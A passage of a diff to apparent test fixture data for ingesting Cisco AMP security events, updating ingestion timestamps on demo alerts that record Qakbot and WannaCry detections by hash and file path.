Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3783,7 +3783,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010865400Z", + "ingested": "2021-12-14T14:40:52.874154587Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3857,7 +3857,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010873400Z", + "ingested": "2021-12-14T14:40:52.874154941Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648143", "kind": "alert", 
@@ -3929,7 +3929,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010878900Z", + "ingested": "2021-12-14T14:40:52.874155286Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -4026,7 +4026,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010884200Z", + "ingested": "2021-12-14T14:40:52.874155643Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -4104,7 +4104,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010889500Z", + "ingested": "2021-12-14T14:40:52.874156002Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", 
@@ -4176,7 +4176,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010892700Z", + "ingested": "2021-12-14T14:40:52.874156472Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -4252,7 +4252,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010896900Z", + "ingested": "2021-12-14T14:40:52.874156835Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -4340,7 +4340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010901900Z", + "ingested": "2021-12-14T14:40:52.874157181Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -4426,7 +4426,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010906400Z", + "ingested": "2021-12-14T14:40:52.874157530Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -4512,7 +4512,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010910200Z", + "ingested": "2021-12-14T14:40:52.874157910Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -4598,7 +4598,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010914400Z", + "ingested": "2021-12-14T14:40:52.874158262Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -4684,7 +4684,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010919700Z", + "ingested": "2021-12-14T14:40:52.874158612Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -4770,7 +4770,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010923700Z", + "ingested": "2021-12-14T14:40:52.874158959Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -4856,7 +4856,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010927600Z", + "ingested": "2021-12-14T14:40:52.874159315Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -4942,7 +4942,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010931700Z", + "ingested": "2021-12-14T14:40:52.874159662Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -5028,7 +5028,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010936Z", + "ingested": "2021-12-14T14:40:52.874160012Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
